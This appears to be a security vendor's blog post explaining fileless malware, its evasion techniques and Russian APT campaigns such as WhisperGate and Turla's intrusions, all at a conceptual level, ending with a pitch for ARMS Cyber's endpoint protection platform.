Over the past several decades, the cybersecurity industry has transformed rapidly through repeated periods of innovation. From desktop antivirus (AV) solutions in the 1990s, and next-generation antivirus solutions (NGAV) in the 2000s, to the somewhat recent appearance of Endpoint/Extended Detection and Response (EDR/XDR), it can be hard to understand what each solution does through the spray of acronym soup.
In a nutshell:
- Antivirus Products (AV) — These are what we generally think of as standalone desktop agents, giving most of what you need to be protected up front. AVs leverage artificial intelligence (AI) to detect the previously-observed signatures of known file-based malware. For example, if a trojan is downloaded from an email and execution is attempted, the AV will scan the file’s binary representation to determine if it has been previously associated with any malicious activity. If it has, execution is stopped, the file is deleted, and an alert is sent to the user.
- Next-Generation Antivirus Products (NGAV) — These widen the aperture to protect against known and unknown file-based malware. NGAVs also leverage AI to look for known malware signatures, but they also leverage additional tools like sandboxes to analyze the overall behavior of questionable files, looking for indicators of malicious interaction. For example, unknown file-based malware may cause specific system calls, look for certain files, and incorporate anti-analysis protections. So, even if a malicious file hasn’t been seen before, the NGAV can still recognize it by scrutinizing initial start up and execution. If the program is determined to be malicious, execution will be terminated and alerts generated for the user.
- Endpoint/Extended Detection and Response (EDR/XDR) — These further expand the focus to include monitoring and response. Instead of just mitigating, EDRs and XDRs collect vast amounts of log event data from a collection of endpoints, leveraging AI to help cybersecurity personnel identify patterns of malicious behavior. If there are no indicators to trigger other protections and an attack is allowed to run, behavior-monitoring picks up on telltale signs that the file is malignant as it moves through the system. The downside is that there absolutely has been an intrusion— but now the monitoring security operating center (SOC) is aware and can begin to react and recover. EDR/EDRs are the most common types of cybersecurity solutions on the market today.
The Rise of Fileless Cyber Attacks
Current cyber solutions focus on (and are limited to) file-based malware. So, over the past few years, attackers have shifted to a stealthier, more evasive approach- embedding their malicious code within a program’s active memory. There is no download, no trace on the filesystem, no recognizable signature or behavior for traditional solutions to detect. This allows attackers to hide in plain sight, disguised to the defender as normal, benign activity.
For a long time, fileless techniques were the domain of nation-states, requiring large teams and endless resources to support the development of this highly sophisticated software. However, as more and more exploits have been leaked, and more malware has been reverse-engineered, fileless techniques have become the staple of modern cyberattacks, increasing by 1400% since 2022. The current estimate is that 91% of ransomware samples use some kind of fileless component. And they’re affordable, with variants like XWorm and Bunny Loader available on the dark web for a few hundred dollars apiece.
There are many in-depth fileless resources available online, notably Alex Adomov’s lecture at VB 2023 illustrating the core aspects of these devastating attacks. Here, though, is a brief overview of their history, current and future impact.
Anatomy of a Fileless Attack
Fileless attacks can be broken down into three types.
- Type One — There is no file trace on the Operating System. Malware behavior is limited to the process memory space and does not interact with outside components. A common example of this is a PowerShell remote exploitation attack. In this case, a dropper is used to download an obfuscated and encoded DLL which is loaded and executed completely in PowerShell process memory.
- Type Two — Malware does not write files to the disk but, some files may be used indirectly. For example, saving malicious code to the registry is a common practice for establishing malware persistence. Even though no file is created on the system, the registry still establishes a footprint that can be traced by the defender.
- Type Three — Malware requires some sort of file footprint to establish execution and persistence. For example, by creating a new task in the task scheduler or requiring a macro in a Word document to establish initial access, files can still assist the kill chain even though the actual malicious payload may not reside within the file itself.\
Defense Evasion (MITRE TTP TA005)
Traditional defenses are great at what they were designed to do: scanning for the known patterns and signatures of previously observed malware. What makes fileless attacks so dangerous is their ability to circumvent everything traditional solutions know to do. These are some of the fileless techniques currently used to bypass and disable existing protections.
- AMSI Bypass — The anti-malware scanning interface (AMSI) in newer versions of Windows allows AVs to scan executables and commands before they are run. Its DLL acts as an intermediary, iterating through every AV’s scan function to determine a file is not malicious. However, by patching the AMSI DLL code in runtime memory, attackers can effectively override the scanning process, disabling any existing cybersecurity solution’s ability to scan for malware.
- Remote Execution (Droppers) — AVs scan files and data structures in the filesystem for indicators of malware. However, modern fileless malware leverages remote execution to limit malicious code’s exposure to the target system. By leveraging a component called a dropper, attackers can insert a piece of stub code on the target system to disable existing protections before downloading the malicious code from a remote server. Since the downloaded code will be loaded and executed from the dropper or another benign program, no footprint will exist for scanners to detect.
- Obfuscation/Encryption — Most modern AI scanning models rely on plain text patterns to detect malicious activity. This allows attackers to leverage obfuscating commands, key data encryption, and even something as simple as changing the name of a function to bypass traditional solutions.
- Reflective Code Loading — A common PowerShell technique is to load a DLL into memory to execute. Often times, this is combined with a dropper to download an encoded DLL, and then load into the current memory context to execute. Currently, MITRE only recommends monitoring for this command as a mitigation, leading to high false positive rates for monitoring solutions
Example 1: Sandworm APT
Sandworm is an element within the Russian intelligence service that is dedicated to executing the Kremlin’s most high-profile hacking efforts, often directed at their target’s critical infrastructure.
Some of the most devastating cyber-attacks in history have been spun out of the Sandworm group, mainly due to the utilization of fileless components. For example:
- Black Energy (2015) — A trojan developed to establish a DDOS capability within the Ukrainian energy sector infrastructure. Malware was initially launched through spear phished excel documents with an embedded macro which launched a PowerShell dropper. The attack left 230,000 residents without power and 2 of 3 distribution centers.
- Industroyer (2016) — Malware was spread throughout Industrial Control System (ICS) substations, completely opening every circuit and causing power stations to explode. This attack leveraged a combination of macros and remote execution for initial infection alongside a data wiper to remove traces of itself. This attack caused thousands of homes in Ukraine to lose power.
- NotPetya (2017) — Was the most damaging attack for its time, causing over $10 Billion in damages. Intended for Ukrainian government facilities, the worm quickly spread throughout the globe, notably effecting Maersk, one of the world’s largest shipping distributors, and Merck Pharmaceuticals, in addition to multiple hospitals and banks. Remote execution and obfuscated fileless droppers were leveraged for the initial infection.
- Olympic Destroyer (2018) — This attack intended to wipe out the Winter Olympics’ digital infrastructure during Opening Ceremonies. Fortunately, the attack had little effect on the games, but a post mortem analysis found several sophisticated evasion techniques including polymorphic mutation, data wiping, and leveraging of the NSA’s leaked Eternal Romance exploit.
- WhisperGate (2022) — Deployed to destroy Ukrainian government systems during initial Russian hostilities. Similar to NotPetya, attackers successfully vandalized over 80 Ukrainian government websites.
As an exemplar for the anatomy of a Sandworm fileless attack, let’s take a closer look at the WhisperGate attack.
As seen above, WhisperGate malware can be broken down into two stages. Stage One uses the MBR utility to wipe the disk while, in Stage Two, a dropper is used to download the File wiper malware to PowerShell (where it is subsequently executed within memory).
In the attack process diagram for the Stage Two, the dropper stub code downloads an image from a Discord CDN server. However, this image is an obfuscated .Net DLL which is storing the respective malware. At this point, the .Net DLL is injected into a benign Windows utility named InstallUtil.exe where Process Hollowing is leveraged to embed the malware within the program.
Once the DLL is loaded into memory, reflective loading is used to filelessly execute the respective malware without filesystem interaction. Then, because the initial payloads were disguised as images, downloaded remotely, and executed within benign processes, the attackers are able to bypass state-of-the-art commercial protections running on the systems.
Example 2: Turla APT
Turla APT, linked to the Russian Federal Security Service (FSB), has been active since at least 2004, targeting several high-profile government and defense organizations around the world, including:
- US Central Command (2008)
- Finnish Ministry of Foreign Affairs (2013)
- Swiss defense contractor RUAG (2014–2016)
- German Bundestag (2017–2018)
Similar to some of the Sandworm attacks, Turla leveraged spear phishing to gain entry into target systems disguised as Excel documents (but were also embedded with dropper macros).
Finally, the payload was downloaded as an obfuscated .Net payload and executed within PowerShell process memory using the same reflection technique leveraged by Sandworm.
This resulted in a backdoor to the attacker command and control server, allowing for future interactions with the target system.
Fileless threats go beyond Government and Defense, affecting the Healthcare, Financial, Entertainment, and Transportation Sectors
It is critical to note how capable fileless attacks are at expanding beyond their initial targets. NotPetya was intended for the Ukrainian government, but organizations around the world were heavily compromised. Increasingly, hospitals, banks, schools and other services suffer the brunt of collateral damage. And while Sandworm and Turla are nation-state backed actors, it is crucial to understand that now even unsophisticated attackers have access to the same set of tools that once required a hostile nation’s cyber A-team.
Due to leaks, increased education and awareness, and open-source tools, fileless attack techniques have been trickling steadily onto the dark web, allowing cyber criminals to execute complex attacks at a fraction of the cost. Assisted by generative AI tools like WormGPT (ChatGPT for cyber-attacks),defense evasion and long term persistence-without-detection are easier now than they have ever been.
Unlike hostile nations, criminals aren’t usually trying to accomplish a political agenda. They’re out to inflict maximum damage on a target that is likely to pay. Healthcare, financial, entertainment, transportation, manufacturing, education – the industry itself doesn’t matter. And whether it is the Rhysidia attack which shut down 17 hospitals and 111 clinics, the Mr. Cooper attack which affected over four million customers, or the Caesar’s/MGM Casino attack which shut down operations for a week and a half, victims are faced with a simple but unthinkable choice: give in or watch their organizations burn to the ground.
The reactive nature of traditional solutions means that organizations must wait for an attack to occur before taking action, scanning for known signatures instead of proactively mitigating malicious activity. By continuously evolving and incorporating fileless techniques, attackers are able to stay one step ahead and maximize their criminal gain. Until defenders are equipped to stop attacks that leave no trace, fileless malware will continue its exponential growth.
How ARMS Cyber can help
Fileless attacks are dangerous because they allow attackers to evade traditional defenses. If an NGAV or EDR tool is completely circumvented or disabled, it doesn’t matter how good the AI detection or response capabilities are. To combat this, ARMS Cyber has built a cutting-edge Endpoint Protection Platform (EPP) solution which proactively detects and stops fileless attacks. We leverage a combination of runtime Moving Target Defenses (MTD), deception, command and behavior analysis, and anti-detonation based on fileless attacks’ core requirements. This allows us to recognize exploits earlier in the kill chain and with fewer false positives than other solutions. By preventing the fileless disablement of NGAV and EDR solutions, organizations can rest easy, knowing that their cyber investments are operating effectively without the risk of attacker evasion.